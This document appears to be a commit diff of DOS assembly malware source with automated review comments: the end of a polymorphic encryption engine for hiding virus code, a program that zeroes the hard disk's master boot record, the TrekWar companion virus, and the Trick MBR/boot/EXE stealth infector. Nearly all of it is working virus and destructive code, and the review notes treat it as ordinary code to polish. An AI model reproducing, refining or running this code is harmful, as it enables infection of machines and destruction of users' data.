pop ax ;ax = length of decrypted code
pop di ;di = offset encrypted code
xor dx,dx ;ds:dx = decryptor + cr. code
push es
pop ds
ret
;****************************************************************************
;* encrypt the code
;****************************************************************************
do_encrypt: add dx,word ptr ds:[add_val]
test bl,2
jnz lup1
xor ax,dx
ret
lup1: test bl,1
jnz lup2
sub ax,dx
ret
lup2: add ax,dx
ret
;****************************************************************************
;* generate mov reg,xxxx
;****************************************************************************
do_mov: mov dx,si
mov al,byte ptr ds:[si+mov_byte]
cmp dl,4 ;BX?
jne is_not_bx
call add_ind
is_not_bx: test dl,0C ;A*?
pushf
jnz is_not_a
test bl,80 ;A* or D*?
jz is_not_a
add al,2
is_not_a: call alter ;insert the MOV
popf ;A*?
jnz is_not_a2
mov ax,word ptr ds:[xor_val]
jmp short sss
is_not_a2: test dl,8 ;B*?
jnz is_not_b
mov si,offset where_len
test dl,2
jz is_not_bh
add si,2
is_not_bh: mov word ptr ds:[si],di
jmp short sss
is_not_b: mov ax,cx ;C*
test bl,10 ;byte or word encryption?
jz sss
inc ax ;only half the number of bytes
shr ax,1
sss: test dl,3 ;byte or word register?
jz is_x
test dl,2 ;*H?
jz is_not_h
xchg al,ah
is_not_h: stosb
ret
is_x: stosw
ret
;****************************************************************************
;* insert MOV or alternative for MOV
;****************************************************************************
alter: push bx
push cx
push ax
call rnd_get
xchg ax,bx
pop ax
test bl,3 ;use alternative for MOV?
jz no_alter
push ax
and bx,0F
and al,08
shl ax,1
or bx,ax
pop ax
and al,7
mov cl,9
xchg ax,cx
mul cl
add ax,30C0
xchg al,ah
test bl,4
jz no_sub
mov al,28
no_sub: call maybe_2
stosw
mov al,80
call maybe_2
stosb
mov ax,offset add_mode
xchg ax,bx
and ax,3
xlat
add al,cl
no_alter: stosb
pop cx
pop bx
ret
;****************************************************************************
;* insert ADD AX,xxxx
;****************************************************************************
do_add_ax: push cx
mov si,offset add_val ;save add-value here
mov word ptr ds:[si],0
mov ax,bx
and ax,8110
xor ax,8010
jnz no_add_ax ;use ADD?
mov ax,bx
xor ah,ah
mov cl,3
div cl
or ah,ah
jnz no_add_ax ;use ADD?
test bl,80
jnz do_81C2 ;AX or DX?
mov al,5
stosb
jmp short do_add0
do_81C2: mov ax,0C281
stosw
do_add0: call rnd_get
mov word ptr ds:[si],ax
stosw
no_add_ax: pop cx
ret
;****************************************************************************
;* generate encryption command
;****************************************************************************
do_xor: test byte ptr ds:[flags],1
jz no_cs
mov al,2E ;insert CS: instruction
stosb
no_cs: test bh,80 ;type of XOR command
jz xor1
call get_xor ;encrypt with register
call do_carry
call save_it
xor ax,ax
test bl,80
jz xxxx
add al,10
xxxx: call add_dir
test bh,8
jnz yyyy
stosb
ret
yyyy: or al,80
stosb
call rnd_get
stosw
mov word ptr ds:[xor_offset],ax
ret
xor1: mov al,080 ;encrypt with value
call save_it
call get_xor
call do_carry
call xxxx
mov ax,word ptr ds:[xor_val]
test bl,10
jmp byte_word
;****************************************************************************
;* generate increase/decrease command
;****************************************************************************
do_add: test bl,8 ;no CMPSW/SCASW if BX is used
jz da0
test bh,2 ;ADD/SUB/INC/DEC or CMPSW/SCASW
jnz do_cmpsw
da0: test bh,4 ;ADD/SUB or INC/DEC?
jz add1
mov al,40 ;INC/DEC
test bh,1 ;up or down?
jz add0
add al,8
add0: call add_ind
stosb
test bl,10 ;byte or word?
jz return
stosb ;same instruction again
return: ret
add1: test bh,40 ;ADD/SUB
jz no_clc2 ;carry?
mov al,0F8 ;insert CLC
stosb
no_clc2: mov al,083
stosb
mov al,0C0
test bh,1 ;up or down?
jz add2
mov al,0E8
add2: test bh,40 ;carry?
jz no_ac2
and al,0CF
or al,10
no_ac2: call add_ind
stosb
mov al,1 ;value to add/sub
save_it: call add_1
stosb
ret
do_cmpsw: test bh,1 ;up or down?
jz no_std
mov al,0FDh ;insert STD
stosb
no_std: test bh,4 ;CMPSW or SCASW?
jz normal_cmpsw
test bl,4 ;no SCASW if SI is used
jnz do_scasw
normal_cmpsw: mov al,0A6 ;CMPSB
jmp short save_it
do_scasw: mov al,0AE ;SCASB
jmp short save_it
;****************************************************************************
;* generate loop command
;****************************************************************************
do_loop: test bh,1 ;no JNE if couting down
jnz loop_loop ; (prefetch bug!)
call rnd_get
test al,1 ;LOOPNZ/LOOP or JNE?
jnz cx_loop
loop_loop: mov al,0E0
test bh,1A ;LOOPNZ or LOOP?
jz ll0 ; no LOOPNZ if xor-offset
add al,2 ; no LOOPNZ if CMPSW/SCASW
ll0: stosb
mov ax,dx
sub ax,di
dec ax
stosb
ret
cx_loop: test bh,10 ;SUB CX or DEC CX?
jnz cxl_dec
mov ax,0E983
stosw
mov al,1
stosb
jmp short do_jne
cxl_dec: mov al,49
stosb
do_jne: mov al,75
jmp short ll0
;****************************************************************************
;* add value to AL depending on register type
;****************************************************************************
add_dir: mov si,offset dir_change
jmp short xx1
add_ind: mov si,offset ind_change
xx1: push bx
shr bl,1
shr bl,1
and bx,3
add al,byte ptr ds:[bx+si]
pop bx
ret
;****************************************************************************
;* mov encryption command byte to AL
;****************************************************************************
get_xor: push bx
mov ax,offset how_mode
xchg ax,bx
and ax,3
xlat
pop bx
ret
;****************************************************************************
;* change ADD into ADC
;****************************************************************************
do_carry: test bl,2 ;ADD/SUB used for encryption?
jz no_ac
test bh,20 ;carry with (encr.) ADD/SUB?
jz no_ac
and al,0CF
or al,10
no_ac: ret
;****************************************************************************
;* change AL (byte/word)
;****************************************************************************
add_1: test bl,10
jz add_1_ret
inc al
add_1_ret: ret
;****************************************************************************
;* change AL (byte/word)
;****************************************************************************
maybe_2: call add_1
cmp al,81 ;can't touch this
je maybe_not
push ax
call rnd_get
test al,1
pop ax
jz maybe_not
add al,2
maybe_not: ret
;****************************************************************************
;* get random nop (or not)
;****************************************************************************
do_nop: test byte ptr ds:[flags],2
jz no_nop
yes_nop: call rnd_get
test al,3
jz nop8
test al,2
jz nop16
test al,1
jz nop16x
no_nop: ret
;****************************************************************************
;* Insert random instructions
;****************************************************************************
do_junk: test byte ptr ds:[flags],4
jz no_junk
call rnd_get ;put a random number of
and ax,0F ; dummy instructions before
inc ax ; decryptor
xchg ax,cx
junk_loop: call junk
loop junk_loop
no_junk: ret
;****************************************************************************
;* get rough random nop (may affect register values)
;****************************************************************************
junk: call rnd_get
and ax,1E
jmp short aa0
nop16x: call rnd_get
and ax,06
aa0: xchg ax,si
call rnd_get
jmp word ptr ds:[si+junkcals]
;****************************************************************************
;* NOP and junk addresses
;****************************************************************************
junkcals dw offset nop16x0
dw offset nop16x1
dw offset nop16x2
dw offset nop16x3
dw offset nop8
dw offset nop16
dw offset junk6
dw offset junk7
dw offset junk8
dw offset junk9
dw offset junkA
dw offset junkB
dw offset junkC
dw offset junkD
dw offset junkE
dw offset junkF
;****************************************************************************
;* NOP and junk routines
;****************************************************************************
nop16x0: and ax,000F ;J* 0000 (conditional)
or al,70
stosw
ret
nop16x1: mov al,0EBh ;JMP xxxx / junk
and ah,07
inc ah
stosw
xchg al,ah ;get lenght of bullshit
cbw
jmp fill_bullshit
nop16x2: call junkD ;XCHG AX,reg / XCHG AX,reg
stosb
ret
nop16x3: call junkF ;INC / DEC or DEC / INC
xor al,8
stosb
ret
nop8: push bx ;8-bit NOP
and al,7
mov bx,offset nop_data8
xlat
stosb
pop bx
ret
nop16: push bx ;16-bit NOP
and ax,0303
mov bx,offset nop_data16
xlat
add al,ah
stosb
call rnd_get
and al,7
mov bl,9
mul bl
add al,0C0
stosb
pop bx
ret
junk6: push cx ;CALL xxxx / junk / POP reg
mov al,0E8
and ah,0F
inc ah
stosw
xor al,al
stosb
xchg al,ah
call fill_bullshit
call do_nop
call rnd_get ;insert POP reg
and al,7
call no_sp
mov cx,ax
or al,58
stosb
test ch,3 ;more?
jnz junk6_ret
call do_nop
mov ax,0F087 ;insert XCHG SI,reg
or ah,cl
test ch,8
jz j6_1
mov al,8Bh
j6_1: stosw
call do_nop
push bx
call rnd_get
xchg ax,bx
and bx,0F7FBh ;insert XOR [SI],xxxx
or bl,8
call do_xor
pop bx
junk6_ret: pop cx
ret
junk7: and al,0F ;MOV reg,xxxx
or al,0B0
call no_sp
stosb
test al,8
pushf
call rnd_get
popf
jmp short byte_word
junk8: and ah,39 ;DO r/m,r(8/16)
or al,0C0
call no_sp
xchg al,ah
stosw
ret
junk9: and al,3Bh ;DO r(8/16),r/m
or al,2
and ah,3F
call no_sp2
call no_bp
stosw
ret
junkA: and ah,1 ;DO rm,xxxx
or ax,80C0
call no_sp
xchg al,ah
stosw
test al,1
pushf
call rnd_get
popf
jmp short byte_word
junkB: call nop8 ;NOP / LOOP
mov ax,0FDE2
stosw
ret
junkC: and al,09 ;CMPS* or SCAS*
test ah,1
jz mov_test
or al,0A6
stosb
ret
mov_test: or al,0A0 ;MOV AX,[xxxx] or TEST AX,xxxx
stosb
cmp al,0A8
pushf
call rnd_get
popf
jmp short byte_word
junkD: and al,07 ;XCHG AX,reg
or al,90
call no_sp
stosb
ret
junkE: and ah,07 ;PUSH reg / POP reg
or ah,50
mov al,ah
or ah,08
stosw
ret
junkF: and al,0F ;INC / DEC
or al,40
call no_sp
stosb
ret
;****************************************************************************
;* store a byte or a word
;****************************************************************************
byte_word: jz only_byte
stosw
ret
only_byte: stosb
ret
;****************************************************************************
;* don't fuck with SP!
;****************************************************************************
no_sp: push ax
and al,7
cmp al,4
pop ax
jnz no_sp_ret
and al,0FBh
no_sp_ret: ret
;****************************************************************************
;* don't fuck with SP!
;****************************************************************************
no_sp2: push ax
and ah,38
cmp ah,20
pop ax
jnz no_sp2_ret
xor ah,20
no_sp2_ret: ret
;****************************************************************************
;* don't use [BP+..]
;****************************************************************************
no_bp: test ah,4
jnz no_bp2
and ah,0FDh
ret
no_bp2: push ax
and ah,7
cmp ah,6
pop ax
jnz no_bp_ret
or ah,1
no_bp_ret: ret
;****************************************************************************
;* write byte for JMP/CALL and fill with random bullshit
;****************************************************************************
fill_bullshit: push cx
xchg ax,cx
bull_lup: call rnd_get
stosb
loop bull_lup
pop cx
ret
;****************************************************************************
;* random number generator (stolen from 'Bomber')
;****************************************************************************
rnd_init: push cx
call rnd_init0 ;init
and ax,000F
inc ax
xchg ax,cx
random_lup: call rnd_get ;call random routine a few
loop random_lup ; times to 'warm up'
pop cx
ret
rnd_init0: push dx ;initialize generator
push cx
mov ah,2C
int 21
in al,40
mov ah,al
in al,40
xor ax,cx
xor dx,ax
jmp short move_rnd
rnd_get: push dx ;calculate a random number
push cx
push bx
mov ax,0 ;will be: mov ax,xxxx
mov dx,0 ; and mov dx,xxxx
mov cx,7
rnd_lup: shl ax,1
rcl dx,1
mov bl,al
xor bl,dh
jns rnd_l2
inc al
rnd_l2: loop rnd_lup
pop bx
move_rnd: mov word ptr ds:[rnd_get+4],ax
mov word ptr ds:[rnd_get+7],dx
mov al,dl
pop cx
pop dx
ret
;****************************************************************************
;* tables for engine
;****************************************************************************
; AX AL AH (BX) BL BH CX CL CH
mov_byte db 0B8, 0B0, 0B4, 0, 0B8, 0B3, 0B7, 0, 0B9, 0B1, 0B5
; nop clc stc cmc cli cld incbp decbp
nop_data8 db 90, 0F8, 0F9, 0F5, 0FA, 0FC, 45, 4Dh
; or and xchg mov
nop_data16 db 8, 20, 84, 88
; bl/bh, bx, si di
dir_change db 07, 07, 04, 05
ind_change db 03, 03, 06, 07
; xor xor add sub
how_mode db 30, 30, 00, 28
; ? add xor or
add_mode db 0, 0C8, 0F0, 0C0
tpe_bottom equ $
end TPE12
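Review bot: `rnd_get` is self-modifying — `move_rnd` stores the new seed into `ds:[rnd_get+4]` and `ds:[rnd_get+7]`, the imm16 operands of the `mov ax,0` / `mov dx,0` that follow the three single-byte pushes — yet nothing at `rnd_get` warns that those offsets are tied to the exact encoding, so inserting or reordering one instruction there silently corrupts the generator; suggest `; SELF-MODIFYING: +4/+7 are the imm16 of the two movs below, keep the 3 pushes in front` at the label. The engine's own variables (`flags`, `xor_val`, `where_len`, the patched `rnd_get`) are all addressed through DS while the header says the input code is also at DS:DX, so the caller must place engine and input in one segment; that requirement belongs in the `Input:` block, since the `bit 0` flag only governs the `CS:` prefix emitted by `do_xor`. As a point of style, hex literals appear both bare under `.radix 16` (`0F8`, `0C281`, `0E983`) and with an explicit `h` (`0FDh`, `4Dh`, `0F7FBh`); one form would be easier to read.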




@ -0,0 +1,169 @@
page ,132
title Trash - smashes the boot record on the first hard disk
name TRASH
.radix 16
code segment
assume cs:code,ds:code
org 100
CODEX equ 0C000 ; Or use 0300 when tracing DOS
CR equ 0Dh
LF equ 0A
start:
jmp do_it
oldint1 dd ?
newintx dd ?
oldintx dd ?
trace db 1
found db 0
buffer db 200 dup (0)
message db CR,LF,'********** W A R N I N G ! ! ! **********',CR,LF,CR,LF
db 'This program, when run, will zero (DESTROY!) the',CR,LF
db 'master boot record of your first hard disk.',CR,LF,CR,LF
db 'The purpose of this is to test the antivirus software,',CR,LF
db 'so be sure you have installed your favourite',CR,LF
db 'protecting program before running this one!',CR,LF
db "(It's almost sure it will fail to protect you anyway!)",CR,LF
db CR,LF,'Press any key to abort, or',CR,LF
db 'press Ctrl-Alt-RightShift-F5 to proceed (at your own risk!) $'
warned db CR,LF,CR,LF,'Allright, you were warned!',CR,LF,'$'
do_it:
mov ax,600 ; Clear the screen by scrolling it up
mov bh,7
mov dx,1950
xor cx,cx
int 10
mov ah,0F ; Get the current video mode
int 10 ; (the video page, more exactly)
mov ah,2 ; Home the cursor
xor dx,dx
int 10
mov ah,9 ; Print a warning message
mov dx,offset message
int 21
mov ax,0C08 ; Flush the keyboard and get a char
int 21
cmp al,0 ; Extendet ASCII?
jne quit1 ; Exit if not
mov ah,8 ; Get the key code
int 21
cmp al,6C ; Shift-F5?
jne quit1 ; Exit if not
mov ah,2 ; Get keyboard shift status
int 16
and al,1101b ; Ctrl-Alt-RightShift?
jnz proceed ; Proceed if so
quit1:
jmp quit ; Otherwise exit
proceed:
mov ah,9 ; Print the last message
mov dx,offset warned
int 21
mov ax,3501 ; Get interrupt vector 1 (single steping)
int 21
mov word ptr oldint1,bx
mov word ptr oldint1+2,es
mov ax,2501 ; Set new INT 1 handler
mov dx,offset newint1
int 21
mov ax,3513 ; Get interrupt vector 13
int 21
mov word ptr oldintx,bx
mov word ptr oldintx+2,es
mov word ptr newintx,bx
mov word ptr newintx+2,es
; The following code is sacred in it's present form.
; To change it would cause volcanos to errupt,
; the ground to shake, and program not to run!
mov ax,200
push ax
push cs
mov ax,offset done
push ax
mov ax,100
push ax
push cs
mov ax,offset faddr
push ax
mov ah,55
iret
assume ds:nothing
faddr:
jmp oldintx
newint1:
push bp
mov bp,sp
cmp trace,0
jne search
exit:
and [bp+6],not 100
exit1:
pop bp
iret
search:
cmp [bp+4],CODEX
jb exit1
;Or use ja if you want to trace DOS-owned interrupt
push ax
mov ax,[bp+4]
mov word ptr newintx+2,ax
mov ax,[bp+2]
mov word ptr newintx,ax
pop ax
mov found,1
mov trace,0
jmp exit
assume ds:code
done:
mov trace,0
push ds
mov ax,word ptr oldint1+2
mov dx,word ptr oldint1
mov ds,ax
mov ax,2501 ; Restore old INT 1 handler
int 21
pop ds
; Code beyong this point is not sacred...
; It may be perverted in any manner by any pervert.
cmp found,1 ; See if original INT 13 handler found
jne quit ; Exit if not
push ds
pop es ; Restore ES
mov ax,301 ; Write 1 sector
mov cx,1 ; Cylinder 0, sector 1
mov dx,80 ; Head 0, drive 80h
mov bx,offset buffer
pushf ; Simulate INT 13
call newintx ; Do it
quit:
mov ax,4C00 ; Exit program
int 21
code ends
end start
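Review bot: The consent check at `and al,1101b` / `jnz proceed` accepts the key if any one of right-Shift, Ctrl or Alt is down, not the Ctrl-Alt-RightShift combination the prompt promises, so for a program that zeroes the MBR the guard is weaker than documented; change it to `and al,1101b` / `cmp al,1101b` / `je proceed` so all three bits must be set. The comment `; Shift-F5?` on `cmp al,6C` is also misleading: 6Ch is the extended code BIOS returns for Alt-F5 (Shift-F5 is 58h), which is consistent with Alt being required but not with the comment. Because `.radix 16` is in effect, it is worth verifying that the assembler really reads `1101b` as binary rather than as the hex digit string `1101B`; MASM 6 introduced the `y` suffix for exactly this ambiguity. The `newint1` frame offsets `[bp+2]`, `[bp+4]`, `[bp+6]` (IP, CS, FLAGS of the interrupt frame after `push bp` / `mov bp,sp`) and `not 100` (clear TF) would also benefit from a one-line comment each.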


@ -0,0 +1,185 @@
;TREKWAR virus - we were overjoyed at Crypt Newsletter when Goose showed
;us his update of CloneWar, TrekWar. Alert readers will remember ACME,
;the musical companion based on ZENO, a relative of CloneWar.
;So here it is!
;TrekWar
;ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;³ Assembly Source Listing for TrekWar Companion Virus ³
;³ Copyright (c) 1993 T.R.E.K. All Rights Reserved. :) ³
;ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
;³ The TrekWar is a simple modification of the Clonewar V2 companion virus; ³
;³ for all you trekkers out there... For those of you who, heaven forbid, do ³
;³ not know what the words below mean, they are the words to the old series ³
;³ opening music of Star Trek... ³
;ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
CSEG SEGMENT
ASSUME CS:CSEG,DS:NOTHING
ORG 100H
START:
jmp VIR_BEGIN ;lets get moving...
db "",13,10
db "",13,10
db "Beyond",13,10 ;blah blah blah
db "The rim of the star-light",13,10
db "My love",13,10
db "Is wand'ring in star-flight",13,10
db "I know",13,10
db "He'll find in star-clustered reaches",13,10
db "Love",13,10
db "Strange love a star woman teaches.",13,10
db "I know",13,10
db "His journey ends never",13,10
db "His star trek",13,10
db "Will go on forever.",13,10
db "But tell him",13,10
db "While he wanders his starry sea",13,10
db "Remember, remember me."
db "",13,10
db "",13,10
db "[TrekWar] " ;what the heck, its only a few bytes!?
WILDCARD DB "*.EXE",0
FILE_EXT DB "COM",0
FILE_FOUND DB 12 DUP(' '), 0
FILE_CREATE DB 12 DUP(' '), 0
SEARCH_ATTRIB DW 17H
NUM_INFECT DW 0
My_Cmd:
CMD_LEN DB 13
FILE_CLONE DB 12 DUP (' '), 0
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Read all the directory filenames and store as records in buffer.
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Vir_begin:
mov sp,offset STACK_HERE ;move stack down
mov bx,sp
add bx,15
mov cl,4
shr bx,cl
mov ah,4ah ;deallocate rest of memory
int 21h
mov di,OFFSET FILE_CLONE ;Point to buffer.
mov si,OFFSET FILE_FOUND
mov cx,12
rep movsb
Read_dir: mov dx,OFFSET WILDCARD ;file mask for directory search
mov cx,SEARCH_ATTRIB
mov ah,4Eh ;find first matching file
int 21h
jc EXIT ;If empty directory, exit
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Store_name:
mov di,OFFSET FILE_FOUND ;Point to buffer.
mov si,158 ;stow the file found in buffer
mov cx,12
rep movsb
mov di,OFFSET FILE_CREATE ;Point to buffer.
mov si,158
mov cx,12
rep movsb
cld
mov di,OFFSET FILE_CREATE
mov al,'.'
mov cx,9
repne scasb ;find the '.'
mov si,OFFSET FILE_EXT
mov cx,3
rep movsb ;replace the .EXE with .COM
;from buffer
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Check_file: ;does the file exist?
mov dx,OFFSET FILE_CREATE
xor cx,cx
mov ax,3d00h ;Open file, read only
int 21h
jnc find_next
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Infect_file: ;create companion routine
mov dx,OFFSET FILE_CREATE ;contains name of "companion"
xor cx,cx
mov ah,3ch ;construct file
int 21h
jc EXIT
;Write virus to companion file
xchg bx,ax
mov cx,(OFFSET END_OF_CODE - OFFSET START) ;virus length
mov dx,OFFSET START
mov ah,40h ;write to file function
int 21h ;do it
;Close file
mov ah,3eh ;assumes bx still has file handle
int 21h
;Change attributes
mov dx,OFFSET FILE_CREATE ;of created file to
mov cx,3 ;(1) read only and (2) hidden
mov ax,4301h
int 21h
jmp prepare_command
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;...findnext...
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
find_next:
mov ah, 4fh ;find next...
int 21h
jmp store_name
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Prepare_command:
cld
mov di,OFFSET FILE_CLONE
mov al,0
mov cx,12
repne scasb ;find the end of string \0
mov al,0Dh ;<CR>
stosb ;replace \0 with a <CR>
mov ax,12 ;store length of the command
sub ax,cx
mov CMD_LEN, al
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Exit:
;Run the original program
mov si, OFFSET MY_CMD
int 2Eh ;Pass command to command
;interpreter for execution
mov ax,4C00H ;Exit to DOS
int 21h
END_OF_CODE = $
STACK_HERE EQU END_OF_CODE + 512
CSEG ENDS
END START
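Review bot: The two `mov si,158` copies at `Store_name` are bare magic numbers — 158 is 9Eh, the filename field of the default DTA at PSP:80h (DTA + 1Eh) — and nothing on the page says so; a named constant such as `DTA_NAME equ 80h+1Eh ;filename inside default DTA` would make both copies and the later `mov cx,12` (8.3 name plus terminator) self-explanatory. The `mov cx,9` before `repne scasb` presumably bounds the search for `'.'` to the 8-character base name plus the dot itself, which is worth a comment as well. Note that this file does not use `.radix 16`, so unlike the neighbouring sources in this commit its bare numerals are decimal; stating that near the top would avoid confusion when the files are read side by side.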


@ -0,0 +1,255 @@
; Trick Virii (446 bytes length!)
; (l) 1997 copyleft by Psychomancer // SPS.
; 2:454/7.64@FidoNet
; MBR/BOOT/EXE stealth hard-removable infector.
; Thanx 2 Nutcracker 4 "cryp_sec" algorithm.
; WARNING! 4 compile tasm /m option needed!
; DON'T RUN IT! ONLY 4 DEMONSTRATION!
model tiny
.code
begin: mov cx,decryp_len
call $+3
xor ah,ah
int 15h ; antiheuristic trick (must b CF=1 on return)
pop si
sbb al,al ; <- set AL in zero manual on 1st execute!
; (in DEBUG)
lea di,[si+decryp_begin-6]
xor_decryp: sub al,0
xor_mask equ $-begin-1
xor cs:[di],al ; decrypt selfbody
inc di
loop xor_decryp
decryp_begin equ $-begin
decryp_code: sub si,6
jz file_start ; goto if run from file
mov bx,7c00h
xor di,di
mov ds,di
mov ss,di
mov sp,bx
dec word ptr ds:[413h] ; decrease TOM
mov ax,[di+3*4]
mov [si+rom_mask],ax ; store crypt mask
int 12h
mov cx,206h
mov [si+offrand],ch ; set in 2
shl ax,cl
mov es,ax
push ss bx
rep movsb ; move selfbody 2 new segm
push es
mov es,cx
mov cl,go_after_move
push cx
retf
;-----------------------------------------------;
file_start: mov ax,0deadh
int 13h ; we present in memory?
jnc file_exit
mov ah,13h
int 2fh
mov ax,259ah
int 21h ; set int 9ah on ROM int 13h
mov ah,13h
int 2fh
push cs
pop es
mov ax,1600h
int 2fh
cmp ax,1600h ; we execute under windoze?
mov al,0
org $-1
jnc $ ; no - will b crypt direntries
org $-1
je no_win_run
mov al,0
org $-1
jmp $ ; yeah - no crypt direntries
org $-1
no_win_run: mov cs:cryp_switch,al ; store it
lea bx,buffer
call copy_2_mbr ; infect mbr on 1st hd
file_exit: .exit
;-----------------------------------------------;
go_after_move equ $-begin
mov si,13h*4
mov di,9ah*4
movsw ; set int 9ah on ROM int 13h
movsw
mov word ptr [si-4],offset int_13h_entry ; hook int 13h
mov [si-2],ax
cmp byte ptr [bx],0ebh ; we loading from floppy boot?
jne load_from_mbr
call copy_2_mbr ; yeah - infect mbr on 1st hd
load_from_mbr: mov cl,11h ; read original mbr code
read_sec: mov dx,80h
mov ax,201h
int 9ah
retf ; exit
;-----------------------------------------------;
int_13h_entry: mov cs:store_fn,ah
mov cs:store_sc,al
cmp ax,0deadh ; our function?
je exit_13h_retf
int 9ah ; call old int 13h
pushf
push ax si di ds dx cx es
pop ds
jc exit_13h ; exit if error
mov ax,0
store_fn = byte ptr $-2
cmp dl,80h ; non-1st hd?
je hd_access
cmp al,3 ; write?
jne exit_13h
cmp dx,cx ; floppy?
ja no_boot_write
dec cx ; boot?
jnz no_boot_write
mov word ptr [bx],3eebh ; yeah - infect floppy boot
jmp copy_2_boot
no_boot_write: mov ax,[bx]
not ax
mul ah
sub ax,72bah ; 'MZ' or 'ZM' in buffer?
jnz exit_13h
int 1ah ; get timer tick
mov cl,0 ; randomize
offrand equ $-begin-1
xchg dx,ax
cwd
idiv cx ; get random
and dx,dx
jnz exit_13h
mov [bx+6],dx ; set number of relocation on zero
mov word ptr [bx+8],4 ; length of header
mov [bx+14h],dx ; set cs:ip on zero (i.e. on trick ;)
mov [bx+16h],dx
rol byte ptr cs:offrand,1 ; change randomize
copy_2_boot: lea di,[bx+40h]
call crypt_self ; self encrypt and move 2 buffer
pop cx dx
call write_sec ; write sector on disk
jmp exit_13h_pop
hd_access: cmp al,2 ; read?
jne no_stealth
and dh,dh ; head is zero?
jnz hd_read
dec cx ; cyl/sec is 0/1?
jnz hd_read
mov cl,11h
push cs
call read_sec ; read original mbr
exit_13h: pop cx dx
exit_13h_pop: pop ds di si ax
popf
exit_13h_retf: retf 2 ; exit from int 13h
no_stealth: cmp al,3 ; write?
jne exit_13h
hd_read: mov cs:cryp_or_decryp,0 ; set "js"
org $-1
js $
org $-1
call crypt_sec ; encrypt direntries in buffer
cryp_switch label byte
jnc decrypt_sec ; goto if direntries is not found
pop cx ; restore cyl/sec
push cx
mov ah,3
int 9ah ; re-write crypted direntries
decrypt_sec: lea ax,exit_13h ; decrypt direntries in buffer
push ax
;-----------------------------------------------;
crypt_sec: mov cx,0 ; number of sector
store_sc = byte ptr $-2
push cx
mov si,bx
scan_next_sec: push cx
mov cl,10h ; number of direntries on one sector
scan_next_elem: push cx si
mov cl,0bh
next_char_name: lodsb
cmp al,' ' ; check if filename
jb get_next_elem
loop next_char_name
lodsb
test al,11001000b ; check if attribute
jnz get_next_elem
mov cl,9
next_char_res: lodsb
and al,al ; check if normal (not long!) filename
jnz get_next_elem
loop next_char_res
test [si],dl ; already en/decrypted?
cryp_or_decryp label byte
js get_next_elem
xor [si],dl ; en/decrypt direntry
mov ax,0 ; mask of crypt
rom_mask equ $-begin-2
sub ax,[si+1]
xor [si+5],ax
mov ah,1 ; set bit
get_next_elem: pop si cx
add si,20h ; get next direntry
loop scan_next_elem
pop cx ; get next sector
loop scan_next_sec
inc cs:cryp_or_decryp ; change condition
sahf ; store bit on cf
pop ax
retn
;-----------------------------------------------;
crypt_self: push cs
pop ds
xor si,si
in al,40h ; get random mask
mov [si+xor_mask],al
mov cl,decryp_begin
rep movsb ; move unencrypted part
mov ah,-1
mov cx,decryp_len
xor_encryp: sub ah,al
movsb
xor es:[di-1],ah
loop xor_encryp ; move and encrypt selfbody
retn
;-----------------------------------------------;
copy_2_mbr: mov cx,1
push cs
call read_sec ; read mbr on 1st hd
cmp byte ptr es:[bx],0 ; already infected?
org $-1
mov cx,0
org $-2
je already_prs
mov cl,11h
call write_sec ; store original mbr in 0/0/17
mov di,bx
call crypt_self ; move and encrypt selfbody
inc cx ; cx=1
write_sec: mov ax,301h
int 9ah ; infect mbr
already_prs: retn
decryp_len equ $-decryp_code
len_body equ $-begin
buffer label byte
end begin
